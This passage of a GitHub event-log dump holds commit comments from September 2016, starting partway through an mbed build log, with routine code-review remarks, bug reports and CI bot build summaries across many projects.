87.7% Compile: serial_api.c\r\n 88.0% Compile: analogout_api.c\r\n 88.4% Compile: analogin_api.c\r\n 88.7% Compile: gpio_api.c\r\n 89.1% Compile: gpio_irq_api.c\r\n 89.4% Compile: storage_driver.c\r\n 89.8% Compile: pinmap.c\r\n 90.1% Compile: rtc_api.c\r\n 90.5% Compile: i2c_api.c\r\n 90.8% Compile: port_api.c\r\n 91.2% Compile: Mutex.cpp\r\n 91.5% Compile: lp_ticker.c\r\n 91.9% Compile: rtos_idle.c\r\n 92.3% Compile: HAL_CM4.S\r\n 92.6% Compile: sleep.c\r\n 93.0% Compile: SVC_Table.S\r\n 93.3% Compile: Semaphore.cpp\r\n 93.7% Compile: HAL_CM.c\r\n 94.0% Compile: RTX_Conf_CM.c\r\n 94.4% Compile: rt_Event.c\r\n 94.7% Compile: rt_MemBox.c\r\n 95.1% Compile: rt_Memory.c\r\n 95.4% Compile: rt_OsEventObserver.c\r\n 95.8% Compile: rt_List.c\r\n 96.1% Compile: rt_Robin.c\r\n 96.5% Compile: rt_Mailbox.c\r\n 96.8% Compile: RtosTimer.cpp\r\n 97.2% Compile: rt_Mutex.c\r\n 97.5% Compile: rt_Semaphore.c\r\n 97.9% Compile: rt_Time.c\r\n 98.2% Compile: rt_Timer.c\r\n 98.6% Compile: rt_System.c\r\n 98.9% Compile: Thread.cpp\r\n 99.3% Compile: rt_Task.c\r\n 99.6% Compile: test_env.cpp\r\n100.0% Compile: rt_CMSIS.c\r\nLink: mbed-os-example-blinky\r\nElf2Bin: mbed-os-example-blinky\r\n+-------------+-------+-------+------+\r\n| Module      | .text | .data | .bss |\r\n+-------------+-------+-------+------+\r\n| Fill        |    71 |     0 | 2225 |\r\n| Misc        | 27075 |  2208 |   88 |\r\n| hal/common  |  1546 |     4 |  277 |\r\n| hal/targets | 10101 |    12 |  184 |\r\n| rtos/rtos   |    22 |     4 |    0 |\r\n| rtos/rtx    |  5721 |    20 | 6786 |\r\n| Subtotals   | 44536 |  2248 | 9560 |\r\n+-------------+-------+-------+------+\r\nAllocated Heap: 65536 bytes\r\nAllocated Stack: unknown\r\nTotal Static RAM memory (data + bss): 11808 bytes\r\nTotal RAM memory (data + bss + heap + stack): 77344 bytes\r\nTotal Flash memory (text + data + misc): 47824 bytes\r\nImage: ./.build/K64F/gcc_arm/mbed-os-example-blinky.bin\r\n```"}},"created_at":"2016-09-13T20:43:57Z"}
{"id":"4558155514","type":"CommitCommentEvent","actor":{"login":"alejospina96"},"repo":{"name":"alejospina96/Boutique"},"payload":{"comment":{"id":19008439,"position":null,"line":null,"path":null,"commit_id":"936cc123510eab56209f0bf9f5947873f4303eb9","created_at":"2016-09-13T20:44:12Z","updated_at":"2016-09-13T20:44:12Z","body":"Al vender solo se añaden al precio 1 vez el valor por unidad"}},"created_at":"2016-09-13T20:44:12Z"}
{"id":"4558157944","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19008442,"position":null,"line":null,"path":null,"commit_id":"36c1592e055f6e45357b968e64b2e7b5c5ef0e70","created_at":"2016-09-13T20:44:36Z","updated_at":"2016-09-13T20:44:36Z","body":"Fixed in latest commit.\r\nSorry for the trouble."}},"created_at":"2016-09-13T20:44:36Z"}
{"id":"4558162358","type":"CommitCommentEvent","actor":{"login":"aldin"},"repo":{"name":"dtk/dtk-server"},"payload":{"comment":{"id":19008457,"position":9,"line":82,"path":"application/model/common_module/update/base_service.rb","commit_id":"665f79b60c953bc543a8e96104d1f9a3b344bd0e","created_at":"2016-09-13T20:45:24Z","updated_at":"2016-09-13T20:45:24Z","body":"What I did to check if this works correctly is install base module, and then install 0.0.1 version of that same module. Then go to server r8server-repo and check in common and service module if branches are created correctly for both versions."}},"created_at":"2016-09-13T20:45:24Z"}
{"id":"4558162676","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19008458,"position":68,"line":437,"path":"server/core/core.cpp","commit_id":"baf66f4ce40d8a1559c24211ff15be02a12d5b2b","created_at":"2016-09-13T20:45:27Z","updated_at":"2016-09-13T20:45:27Z","body":"This was accidentally sent through. It won't have any effect since it's #defined out anyways"}},"created_at":"2016-09-13T20:45:27Z"}
{"id":"4558163516","type":"CommitCommentEvent","actor":{"login":"miguelcleon"},"repo":{"name":"miguelcleon/ODM2-Admin"},"payload":{"comment":{"id":19008460,"position":194,"line":858,"path":"ODM2CZOData/forms.py","commit_id":"2638445dc6af481a83e28ef2b96e9d6ac0792bd4","created_at":"2016-09-13T20:45:35Z","updated_at":"2016-09-13T20:45:35Z","body":"@lsetiawan , I can't get this one to work, I tried removing the old template (https://github.com/miguelcleon/ODM2-Admin/blob/master/templatesAndSettings/templates/admin/odm2testapp/dataloggerfiles/change_form.html) \r\ncommenting out lines 856, 860 and 861, but I couldn't get the inline to work, when I would try it the page would just take forever trying to load and never return, I must be missing something. \r\n"}},"created_at":"2016-09-13T20:45:35Z"}
{"id":"4558175524","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19008489,"position":null,"line":null,"path":null,"commit_id":"baf66f4ce40d8a1559c24211ff15be02a12d5b2b","created_at":"2016-09-13T20:47:42Z","updated_at":"2016-09-13T20:47:42Z","body":"Check line comment above ^^^"}},"created_at":"2016-09-13T20:47:42Z"}
{"id":"4558184813","type":"CommitCommentEvent","actor":{"login":"bjh45964"},"repo":{"name":"KPB-US/tars"},"payload":{"comment":{"id":19008511,"position":null,"line":null,"path":null,"commit_id":"9e108de9e5641b0e3348edff9dad9946da6ffad6","created_at":"2016-09-13T20:49:22Z","updated_at":"2016-09-13T20:49:22Z","body":"Closes #75 "}},"created_at":"2016-09-13T20:49:22Z"}
{"id":"4558184860","type":"CommitCommentEvent","actor":{"login":"KindDragon"},"repo":{"name":"Microsoft/GSL"},"payload":{"comment":{"id":19008512,"position":null,"line":null,"path":null,"commit_id":"e40729a561b208429d9298ee60f5a4945c096c99","created_at":"2016-09-13T20:49:23Z","updated_at":"2016-09-13T20:49:23Z","body":"Issue with `operator|=` now solved, but not I have error:\r\n```\r\n error LNK2005: \"enum gsl::byte __cdecl gsl::to_byte_impl<1,unsigned char>(unsigned char)\" (??$to_byte_impl@$00E@gsl@@YA?AW4byte@0@E@Z) already defined in ...\r\n```"}},"created_at":"2016-09-13T20:49:23Z"}
{"id":"4558187997","type":"CommitCommentEvent","actor":{"login":"6eff"},"repo":{"name":"SocialList/devine"},"payload":{"comment":{"id":19008523,"position":null,"line":null,"path":null,"commit_id":"986bbdb9f503a6014a554a9dca7e0e6125890b1a","created_at":"2016-09-13T20:49:58Z","updated_at":"2016-09-13T20:49:58Z","body":"projects where created without linking to user. @project.user = current_user"}},"created_at":"2016-09-13T20:49:58Z"}
{"id":"4558189587","type":"CommitCommentEvent","actor":{"login":"EinarasGar"},"repo":{"name":"EinarasGar/ArduPlayer"},"payload":{"comment":{"id":19008531,"position":8,"line":169,"path":"ArduPlayer/ArduPlayeris/SCom.cs","commit_id":"38648474bac21f2289c31e1a4cd7e2ef29cd568f","created_at":"2016-09-13T20:50:17Z","updated_at":"2016-09-13T20:50:17Z","body":"Sometimes this function gave me exceptions, so I added loop to try again if it failed."}},"created_at":"2016-09-13T20:50:17Z"}
{"id":"4558193260","type":"CommitCommentEvent","actor":{"login":"Philhil"},"repo":{"name":"freifunk-stuttgart/site-ffs"},"payload":{"comment":{"id":19008541,"position":null,"line":null,"path":null,"commit_id":"c2f0acde6ed9983b9d59e78311549b8eacc94fde","created_at":"2016-09-13T20:50:56Z","updated_at":"2016-09-13T20:50:56Z","body":"Is distance a valid setting in site.conf? I can not find anything in the documentation."}},"created_at":"2016-09-13T20:50:56Z"}
{"id":"4558194878","type":"CommitCommentEvent","actor":{"login":"Mazuh"},"repo":{"name":"Mazuh/UsitUFRN"},"payload":{"comment":{"id":19008547,"position":null,"line":null,"path":null,"commit_id":"17845a1b7c6e922186e0c0b39a6bd260075f8a80","created_at":"2016-09-13T20:51:15Z","updated_at":"2016-09-13T20:51:15Z","body":"git rm --cached -r ."}},"created_at":"2016-09-13T20:51:15Z"}
{"id":"4558194990","type":"CommitCommentEvent","actor":{"login":"JoeSz"},"repo":{"name":"JoeSz/Sticky-Anything"},"payload":{"comment":{"id":19008549,"position":null,"line":null,"path":null,"commit_id":"d57ae5b4562ac10f99833ea23932bd0cc8857de8","created_at":"2016-09-13T20:51:16Z","updated_at":"2016-09-13T20:51:16Z","body":"Fire event only on scroll or resize"}},"created_at":"2016-09-13T20:51:16Z"}
{"id":"4558198714","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19008562,"position":null,"line":null,"path":null,"commit_id":"ee3750a0f5f7587c12a8ed68457ee359cbebbc64","created_at":"2016-09-13T20:51:55Z","updated_at":"2016-09-13T20:51:55Z","body":"Second part of this is over at 533f9d5e5fbf6af307fcb54fd6dc52e6ac85615f"}},"created_at":"2016-09-13T20:51:55Z"}
{"id":"4558199441","type":"CommitCommentEvent","actor":{"login":"chvalean"},"repo":{"name":"LIS/lis-next"},"payload":{"comment":{"id":19008563,"position":4,"line":23,"path":"hv-rhel7.x/hv/rhel7-hv-driver-install","commit_id":"23abe96d9d71b337308e94b7506b04593eded6b8","created_at":"2016-09-13T20:52:02Z","updated_at":"2016-09-13T20:52:02Z","body":"Minor typo, should read 'scripts'"}},"created_at":"2016-09-13T20:52:02Z"}
{"id":"4558201678","type":"CommitCommentEvent","actor":{"login":"0table0"},"repo":{"name":"0table0/LSD-SLAM"},"payload":{"comment":{"id":19008568,"position":null,"line":null,"path":null,"commit_id":"264b62dc676d31a6b9e1b02aff971d8c63a434e6","created_at":"2016-09-13T20:52:26Z","updated_at":"2016-09-13T20:52:26Z","body":"ssss"}},"created_at":"2016-09-13T20:52:26Z"}
{"id":"4558205385","type":"CommitCommentEvent","actor":{"login":"gsanjeevkumar"},"repo":{"name":"gsanjeevkumar/mean-sample-01"},"payload":{"comment":{"id":19008578,"position":null,"line":null,"path":null,"commit_id":"2f49161cc78dd88a1aaf02749ba4e6e5264d29ab","created_at":"2016-09-13T20:53:08Z","updated_at":"2016-09-13T20:53:08Z","body":"Added Grunt Capabilities"}},"created_at":"2016-09-13T20:53:08Z"}
{"id":"4558209061","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19008591,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-13T20:53:46Z","updated_at":"2016-09-13T20:53:46Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2367 of 2368 tests passed, 1 test warnings)\n\n * 2 tests had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T20:53:46Z"}
{"id":"4558210167","type":"CommitCommentEvent","actor":{"login":"KyleFung"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":19008598,"position":27,"line":111,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-13T20:53:58Z","updated_at":"2016-09-13T20:53:58Z","body":"Seeing as this feature is mainly used by automated systems, I think adding a warning message to the response might break some things, and won't add much value as no one will read them."}},"created_at":"2016-09-13T20:53:58Z"}
{"id":"4558210771","type":"CommitCommentEvent","actor":{"login":"ebraminio"},"repo":{"name":"behdad/harfbuzz"},"payload":{"comment":{"id":19008601,"position":16,"line":624,"path":"src/hb-ft.cc","commit_id":"62bb58d272e6027e003a88f8e0a7276bd9502d0f","created_at":"2016-09-13T20:54:05Z","updated_at":"2016-09-13T20:54:05Z","body":"This has broken [CI builds](https://travis-ci.org/behdad/harfbuzz/jobs/159647066#L829)."}},"created_at":"2016-09-13T20:54:05Z"}
{"id":"4558220072","type":"CommitCommentEvent","actor":{"login":"neilmacintosh"},"repo":{"name":"Microsoft/GSL"},"payload":{"comment":{"id":19008626,"position":null,"line":null,"path":null,"commit_id":"e40729a561b208429d9298ee60f5a4945c096c99","created_at":"2016-09-13T20:55:42Z","updated_at":"2016-09-13T20:55:42Z","body":"Aha yes! My mistake there, I merged in some other `byte`-related functions and forgot to ensure they were marked `inline` for MSVC 2013. I'll go fix this shortly."}},"created_at":"2016-09-13T20:55:42Z"}
{"id":"4558225029","type":"CommitCommentEvent","actor":{"login":"Wijaxu"},"repo":{"name":"Nukem9/LinkerMod"},"payload":{"comment":{"id":19008639,"position":11,"line":10,"path":"components/game_mod/common.cpp","commit_id":"5b844fd6f387c3d3b39155bf264fe330283deae3","created_at":"2016-09-13T20:56:35Z","updated_at":"2016-09-13T20:56:35Z","body":"not working, change to !strcmp"}},"created_at":"2016-09-13T20:56:35Z"}
{"id":"4558227682","type":"CommitCommentEvent","actor":{"login":"jcaudle"},"repo":{"name":"dwaite498/BlocJamz"},"payload":{"comment":{"id":19008650,"position":8,"line":8,"path":"index.html","commit_id":"01e5a4fe3124a59fb9822c7b65fe76c62c3e86f0","created_at":"2016-09-13T20:57:05Z","updated_at":"2016-09-13T20:57:05Z","body":"This should have a file extension of `css` not `cssn`"}},"created_at":"2016-09-13T20:57:05Z"}
{"id":"4558229931","type":"CommitCommentEvent","actor":{"login":"matobet"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19008657,"position":5,"line":8,"path":"lib/extensions/ar_region.rb","commit_id":"0401c16fef5d1ba5f8b5aa5ae432834b1322140b","created_at":"2016-09-13T20:57:28Z","updated_at":"2016-09-13T20:57:28Z","body":"to reproduce:\r\n```ruby\r\nCOMPRESSED_ID_SEPARATOR = 'r'.freeze\r\nCID_OR_ID_MATCHER = \"\\\\d+?#{COMPRESSED_ID_SEPARATOR}?\\\\d+\".freeze\r\ncollection = :providers\r\n\r\n\"http://localhost:3000/api/providers/2\".match %r{^.*/#{collection}/(#{CID_OR_ID_MATCHER})$}\r\n=> nil\r\n```\r\nReplacing `+?` with `*` in the pattern fixes it. \r\nTested on `ruby 2.3.0p0 (2015-12-25 revision 53290) [x86_64-linux]`."}},"created_at":"2016-09-13T20:57:28Z"}
{"id":"4558233240","type":"CommitCommentEvent","actor":{"login":"NikoKrause"},"repo":{"name":"linuxmint/Cinnamon"},"payload":{"comment":{"id":19008668,"position":null,"line":null,"path":null,"commit_id":"b9344bb9829a3a2e8d886e60eda7d6dd64360a53","created_at":"2016-09-13T20:58:04Z","updated_at":"2016-09-13T20:58:04Z","body":"I'd like to explain, why I expect the above mentioned behavior:\r\nGerman {German flag <-> \"de\"}\r\nRussian (Germany, phonetic) {Russian flag <-> \"ru\"}\r\n\r\nThe layout \"Russian (Germany, phonetic)\" is a keyboard layout, which types Russian/Cyrillic letters.\r\nThe original \"Russian\" layout looks like this:\r\n![kb_russian svg](https://cloud.githubusercontent.com/assets/8415124/18490793/ce00e2ca-7a03-11e6-809f-7efa05c56595.png)\r\n\r\nThe \"German\" layout looks like the \"English\" one, except the letters Y and Z switched.\r\n\r\nSo if try to write Russian with the Russian layout on a German keyboard, it's difficult to remember where each letter is. For example If you want to write the Russian letter A you have to press the German letter F at a German keyboard. That's confusing.\r\n\r\nThe layout \"Russian (Germany, phonetic)\" was designed for people who have a notebook or a PC with a German keyboard, but who want to write Russian. So they permuted the places of the Russian letters to make it more easy to find the right letters: So if I press German A letter I get the Russian A. If I press the German F, I get the Russian Ф (<- that's the Russian F).\r\n\r\nSo when I choose \"Russian (Germany, phonetic)\", I am about to write Russian. It makes no sense for me at all to see the German flag there and even less sense to see the abbreviation \"de\" instead of \"ru\".\r\n\r\nSorry for this confusing and poor written explanation. "}},"created_at":"2016-09-13T20:58:04Z"}
{"id":"4558236670","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19008680,"position":null,"line":null,"path":null,"commit_id":"43533d7195e3ffab590d52e61836290de27c9710","created_at":"2016-09-13T20:58:37Z","updated_at":"2016-09-13T20:58:37Z","body":"The following doc(s) have been deployed to the [1881kalabo](https://1881kalabo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/kalabox](https://1881kalabo-static-docs.pantheonsite.io/docs/kalabox)\n- [docs/local-development](https://1881kalabo-static-docs.pantheonsite.io/docs/local-development)\n"}},"created_at":"2016-09-13T20:58:37Z"}
{"id":"4558237892","type":"CommitCommentEvent","actor":{"login":"alloy"},"repo":{"name":"Fingertips/FTWebViewController"},"payload":{"comment":{"id":19008686,"position":null,"line":null,"path":null,"commit_id":"141cc4d6fc9e547d8d16c1a2fae6c63554ef429a","created_at":"2016-09-13T20:58:49Z","updated_at":"2016-09-13T20:58:49Z","body":"CGIntegralRect(self.bounds)"}},"created_at":"2016-09-13T20:58:49Z"}
{"id":"4558242841","type":"CommitCommentEvent","actor":{"login":"adriencanterot"},"repo":{"name":"vapor/example"},"payload":{"comment":{"id":19008700,"position":null,"line":null,"path":null,"commit_id":"dea4e3d633be67a1698e6132465238961c6e60ee","created_at":"2016-09-13T20:59:38Z","updated_at":"2016-09-13T20:59:38Z","body":"Hi @LoganWright , I don't get the change made in Models/User.swift concerning this commit.\r\n when I try this code, the convenience init added prevents the one declared in the `Model` protocol to automatically retrieve the model corresponding to an id passed by URL such as \r\n`/users/5`\r\nIn fact, it tries to perform \r\n```swift\r\nextension User {\r\n    public convenience init?(from string:String) throws {\r\n        self.init(name: string)\r\n    }\r\n}\r\n```\r\n\r\ninstead of : \r\n```swift\r\nextension Model {\r\n    public init?(from string: String) throws {\r\n        if let model = try Self.find(string) {\r\n            self = model\r\n        } else {\r\n            return nil\r\n        }\r\n    }\r\n}\r\n```\r\n\r\nIs it an expected behavior ?\r\nThanks :) "}},"created_at":"2016-09-13T20:59:38Z"}
{"id":"4558247433","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19008716,"position":null,"line":null,"path":null,"commit_id":"c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7","created_at":"2016-09-13T21:00:27Z","updated_at":"2016-09-13T21:00:27Z","body":"empd_bugfix (nmerket) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c8d70a2a6cfdf4dc075c7fd42c6e59770a7c92d7-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T21:00:27Z"}
{"id":"4558252973","type":"CommitCommentEvent","actor":{"login":"tutorial123"},"repo":{"name":"tutorial123/hello-world"},"payload":{"comment":{"id":19008732,"position":null,"line":null,"path":null,"commit_id":"63dec9cb28417995d83eb987cf940ddf879dd54c","created_at":"2016-09-13T21:01:21Z","updated_at":"2016-09-13T21:01:21Z","body":"added hi"}},"created_at":"2016-09-13T21:01:21Z"}
{"id":"4558256445","type":"CommitCommentEvent","actor":{"login":"tannernelson"},"repo":{"name":"vapor/example"},"payload":{"comment":{"id":19008736,"position":null,"line":null,"path":null,"commit_id":"dea4e3d633be67a1698e6132465238961c6e60ee","created_at":"2016-09-13T21:01:55Z","updated_at":"2016-09-13T21:01:55Z","body":"I think this carries over from an old example showing off how `StringInitializable` works. It can probably be removed."}},"created_at":"2016-09-13T21:01:55Z"}
{"id":"4558258504","type":"CommitCommentEvent","actor":{"login":"wolfgangkarall"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":19008740,"position":18,"line":77,"path":"packaging/apt_key","commit_id":"538a998d2651b17b5434ac6fa1f8453439ffedf6","created_at":"2016-09-13T21:02:15Z","updated_at":"2016-09-13T21:02:15Z","body":".gpg is the extension usually used for keys in binary format, and according to https://github.com/ansible/ansible/issues/11594#issuecomment-122618644 the file lookup can't handle binary -> would be nice to use .asc, the usual extension associated with files containing ASCII armored keys or add a hint in the comment."}},"created_at":"2016-09-13T21:02:15Z"}
{"id":"4558259437","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19008743,"position":null,"line":null,"path":null,"commit_id":"d34f2f7b7dd7d5209238d2ab09117dfd3fd61993","created_at":"2016-09-13T21:02:22Z","updated_at":"2016-09-13T21:02:22Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2302 of 2467 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d34f2f7b7dd7d5209238d2ab09117dfd3fd61993-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d34f2f7b7dd7d5209238d2ab09117dfd3fd61993-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.31%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T21:02:22Z"}
{"id":"4558269721","type":"CommitCommentEvent","actor":{"login":"Bogdan-G"},"repo":{"name":"Bogdan-G/GT5-Unofficial"},"payload":{"comment":{"id":19008776,"position":null,"line":null,"path":null,"commit_id":"4ffc487c7790164659caf4860915d167ecc5c4d2","created_at":"2016-09-13T21:04:13Z","updated_at":"2016-09-13T21:04:13Z","body":"1 коммент-склейка, часть изменений сделано не сегодня, но в основном в сентябре."}},"created_at":"2016-09-13T21:04:13Z"}
{"id":"4558269877","type":"CommitCommentEvent","actor":{"login":"Oddsized"},"repo":{"name":"Oddsized/onepiece"},"payload":{"comment":{"id":19008778,"position":71,"line":376,"path":"page.php","commit_id":"28f20432d118de7f200028c9f27509d21bd5eaa9","created_at":"2016-09-13T21:04:14Z","updated_at":"2016-09-13T21:04:14Z","body":"not ending php in Wordpress can have a security benefit in a theme based code"}},"created_at":"2016-09-13T21:04:14Z"}
{"id":"4558273852","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19008786,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-13T21:04:58Z","updated_at":"2016-09-13T21:04:58Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1760 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-13T21:04:58Z"}
{"id":"4558291035","type":"CommitCommentEvent","actor":{"login":"wolfgangkarall"},"repo":{"name":"ansible/ansible"},"payload":{"comment":{"id":19008826,"position":199,"line":13,"path":"docsite/latest/rst/playbooks_lookups.rst","commit_id":"c10904bcef3df9bdab6a0d7ee0525b5c790a0104","created_at":"2016-09-13T21:07:53Z","updated_at":"2016-09-13T21:07:53Z","body":"According to https://github.com/ansible/ansible/issues/11594#issuecomment-122618644 this handles ASCII only, would be nice to mention this."}},"created_at":"2016-09-13T21:07:53Z"}
{"id":"4558293106","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19008832,"position":null,"line":null,"path":null,"commit_id":"7b9e0917658547e5a0528a9054daeb1622d277b6","created_at":"2016-09-13T21:08:18Z","updated_at":"2016-09-13T21:08:18Z","body":"The following doc(s) have been deployed to the [1881kalabo](https://1881kalabo-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/kalabox](https://1881kalabo-static-docs.pantheonsite.io/docs/kalabox)\n- [docs/local-development](https://1881kalabo-static-docs.pantheonsite.io/docs/local-development)\n"}},"created_at":"2016-09-13T21:08:18Z"}
{"id":"4558305424","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":19008865,"position":6,"line":21,"path":"src/Symfony/Component/Console/composer.json","commit_id":"f5c1b1c077b90e2c5edb72020fb692ea7bafa66a","created_at":"2016-09-13T21:10:38Z","updated_at":"2016-09-13T21:10:38Z","body":"This looks like a bad merge."}},"created_at":"2016-09-13T21:10:38Z"}
{"id":"4558312615","type":"CommitCommentEvent","actor":{"login":"elsonrodriguez"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19008883,"position":19,"line":139,"path":"examples/experimental/persistent-volume-provisioning/README.md","commit_id":"5445ccf4cbc8aa5794e125f1b66dcc16ae4a9572","created_at":"2016-09-13T21:11:58Z","updated_at":"2016-09-13T21:11:58Z","body":"Fixed"}},"created_at":"2016-09-13T21:11:58Z"}
{"id":"4558327363","type":"CommitCommentEvent","actor":{"login":"Hyzual"},"repo":{"name":"Hyzual/knotsjs"},"payload":{"comment":{"id":19008915,"position":21,"line":21,"path":"lib/dependencies.js","commit_id":"4e1d556f82b35ea7da494000cef08c5025fdb9fc","created_at":"2016-09-13T21:14:40Z","updated_at":"2016-09-13T21:14:40Z","body":"Hi, well jsgraph has been very useful, thanks for making it ! :) "}},"created_at":"2016-09-13T21:14:40Z"}
{"id":"4558327887","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19008917,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-13T21:14:46Z","updated_at":"2016-09-13T21:14:46Z","body":"@mcostalba Looking again at your code, it just occurred to me that your version is not correct either, because it will accumulate in pinners the attacking pieces for which we have *zero or one* blocker.\r\n\r\nThe correct version would be:\r\n````\r\nif (b && !more_than_one(b))\r\n     pinners |= pp, result |= b;\r\n````"}},"created_at":"2016-09-13T21:14:46Z"}
{"id":"4558330562","type":"CommitCommentEvent","actor":{"login":"ericscollins"},"repo":{"name":"teamevolve/EVOLVE"},"payload":{"comment":{"id":19008924,"position":null,"line":null,"path":null,"commit_id":"7190b54c654bfe5f5d4e5387143a5e79f689ce73","created_at":"2016-09-13T21:15:18Z","updated_at":"2016-09-13T21:15:18Z","body":"Can you move this code into Design/pseudocode/reproduction.pc? Also, please see the notes in CommonVariables.pc"}},"created_at":"2016-09-13T21:15:18Z"}
{"id":"4558338248","type":"CommitCommentEvent","actor":{"login":"adnanh"},"repo":{"name":"adnanh/webhook"},"payload":{"comment":{"id":19008946,"position":null,"line":null,"path":null,"commit_id":"b5ed4cbea7fbddf2d384979f442a0ca5a2b13548","created_at":"2016-09-13T21:16:40Z","updated_at":"2016-09-13T21:16:40Z","body":"Pretty sure I answered already, but I can't find my comment anywhere. Anyway, since the 2.4.0 was broken, I deleted it and recreated it with the latest commit."}},"created_at":"2016-09-13T21:16:40Z"}
{"id":"4558338974","type":"CommitCommentEvent","actor":{"login":"grahamw0"},"repo":{"name":"grahamw0/Blackjack"},"payload":{"comment":{"id":19008947,"position":null,"line":null,"path":null,"commit_id":"a4ff5556adae939eca010ff5117afc647747626f","created_at":"2016-09-13T21:16:48Z","updated_at":"2016-09-13T21:16:48Z","body":"Also adds the needed amount of new players to the list of players."}},"created_at":"2016-09-13T21:16:48Z"}
{"id":"4558340276","type":"CommitCommentEvent","actor":{"login":"sunboshan"},"repo":{"name":"elixir-ecto/ecto"},"payload":{"comment":{"id":19008952,"position":null,"line":null,"path":null,"commit_id":"6da0fcbea56d93f5776bf589621b70366082f49b","created_at":"2016-09-13T21:17:03Z","updated_at":"2016-09-13T21:17:03Z","body":"Just about to submit a PR for this fix and find out you already fixed it! Thanks @josevalim !"}},"created_at":"2016-09-13T21:17:03Z"}
{"id":"4558346547","type":"CommitCommentEvent","actor":{"login":"JBCDroid2"},"repo":{"name":"CypherOS/packages_apps_Settings"},"payload":{"comment":{"id":19008961,"position":null,"line":null,"path":null,"commit_id":"3cc89e10291ba8ae83e2eccad17448f8a7050bad","created_at":"2016-09-13T21:18:17Z","updated_at":"2016-09-13T21:18:17Z","body":"ERROR\r\npackages/apps/Settings/res/values-it/cypher_strings.xml:172: error: Apostrophe not preceded by \\ (in Consenti l\\'accesso ai dati di sblocco per l'\\utilizzo della memoria del telefono tramite USB (MTP, PTP))\r\n\r\ntry changing the line 172 to\r\n\r\n<string name=\"usb_data_auto_unlock_summary\">Consenti l\\'accesso ai dati di sblocco per l\\'utilizzo della memoria del telefono tramite USB (MTP, PTP)</string>\r\n\r\n"}},"created_at":"2016-09-13T21:18:17Z"}
